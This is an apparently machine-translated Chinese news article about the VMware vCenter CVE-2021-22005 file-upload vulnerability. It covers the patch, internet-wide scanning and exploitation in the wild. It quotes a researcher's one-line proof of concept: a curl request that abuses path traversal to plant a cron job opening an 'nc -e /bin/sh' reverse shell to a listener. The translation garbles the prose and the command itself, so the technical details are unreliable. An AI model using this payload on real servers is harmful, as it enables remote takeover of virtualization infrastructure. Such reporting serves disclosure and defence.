VMware vCenter 中 CVE-2021-22005 的完整 PoC 漏洞可在線獲得

VMware vCenter 中CVE-2021-22005漏洞的工作漏洞已公開提供，攻擊者已經嘗試在使用它。

VMware 最近處理了關鍵任意文件上傳漏洞 CVE-2021-22005，它影響運行默認 vCenter 服務器 6.7 和 7.0 部署的設備。

vCenter 服務器是 VMware 的集中管理實用程序，用于管理虛擬計算機、多個 ESXi 主機以及來自單個集中位置的所有受撫養組件。

漏洞是由于它處理會話令牌的方式。

"VMware 發布了針對新的關鍵安全咨詢 VMSA-2021-0020 的補丁。如果您使用 vCenter服務器，這需要您立即關注。"VMSA 概述了在此修補程序版本中解決的一些問題。最緊迫的地址 CVE-2021-22005，一個文件上傳漏洞，可用于在 vCenter 服務器設備上執行命令和軟件。此漏洞可用于任何可以通過網絡訪問 vCenter 服務器以獲取訪問權限的任何人，無論 vCenter 服務器的配置設置如何。

雖然該公司敦促其客戶立即應用安全修補程序來修復漏洞，但威脅參與者開始在互聯網上掃描易受攻擊的系統。

威脅情報公司Bad Packets報告說，在虛擬化巨頭解決這一缺陷后，立即開始對此漏洞進行掃描活動。

CVE-2021-22005 掃描活動檢測從 116.48.233.234（） 。目標：VMware

vCenter 服務器容易受到任意文件上傳導致遠程代碼執行（https://t.co/JWfc7rHuUK） 的影響。

#threatintel pic.twitter.com/mDFQtyx8IG

? 壞包（@bad_packets） 2021 年 9 月 22 日

Bleeping計算機的研究人員還報告說，威脅行為者已經開始利用安全研究員張發布的代碼利用CVE-2021-22005。

VMware證實，它知道威脅行為者利用在野外的缺陷。

"VMSA 概述了在此修補程序版本中解決的一些問題。最緊迫的地址 CVE-2021-22005，一個文件上傳漏洞，可用于在 vCenter 服務器設備上執行命令和軟件。此漏洞可用于任何可以通過網絡訪問 vCenter 服務器以獲取訪問權限的任何人，無論 vCenter 服務器的配置設置如何。閱讀Vmware 發布的帖子。

現在，一個針對該漏洞的不同漏洞代碼正在在線流傳，它允許遠程攻擊者在易受攻擊的系統上打開反向外殼并執行任意代碼。

研究人員wvu發布了 CVE-2021-22005 的未編輯 PoC 漏洞，該漏洞與啟用客戶體驗改進計劃 （CEIP） 組件（默認配置）的系統相抗效。

CVE-2021-22005：野外開發得到證實。未編輯的 Rce Poc 對下面的 Ceip 。

卷曲 - kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/。

/../../../../../etc/cron.d/$RANDOM" -H 內容類型： -d * * * 根 nc - e /bin/sh 172.16.57.1 4444" https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA

? wvu （@wvuuuuuuuuuuuuu） 2021 年 9 月 27 日

需要說明的是，只有啟用 CEIP（這是一個 "選擇退出" 功能）時，這些特定端點才能被利用。

? wvu （@wvuuuuuuuuuuuuu） 2021 年 9 月 24 日

專家毫不懷疑，漏洞的可用性將導致針對易受此漏洞攻擊的系統的攻擊數量激增。